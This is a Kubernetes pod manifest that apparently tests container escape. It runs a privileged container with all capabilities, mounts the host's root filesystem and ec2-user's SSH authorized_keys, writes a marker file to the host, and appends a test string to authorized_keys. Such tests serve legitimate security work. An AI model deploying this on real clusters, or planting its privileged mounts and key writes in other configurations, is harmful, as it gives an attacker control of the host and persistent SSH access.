apiVersion: v1
kind: Pod
metadata:
  name: escalation2-pod
  labels:
    app: escalation2
spec:
  containers:
  - name: escalation2
    image: ubuntu
    command: ["/bin/bash"]
    args: ["-c", "touch /host-root/tmp/container-escape-hostpath.txt; echo ESCALATION_TEST >> /host/authorized_keys; sleep 3600"]
    securityContext:
      privileged: true
      capabilities:
        add:
          - ALL
    volumeMounts:
    - name: host-ssh
      mountPath: /host/authorized_keys
    - name: host-root
      mountPath: /host-root
  volumes:
  - name: host-ssh
    hostPath:
      path: /home/ec2-user/.ssh/authorized_keys
  - name: host-root
    hostPath:
      path: /
      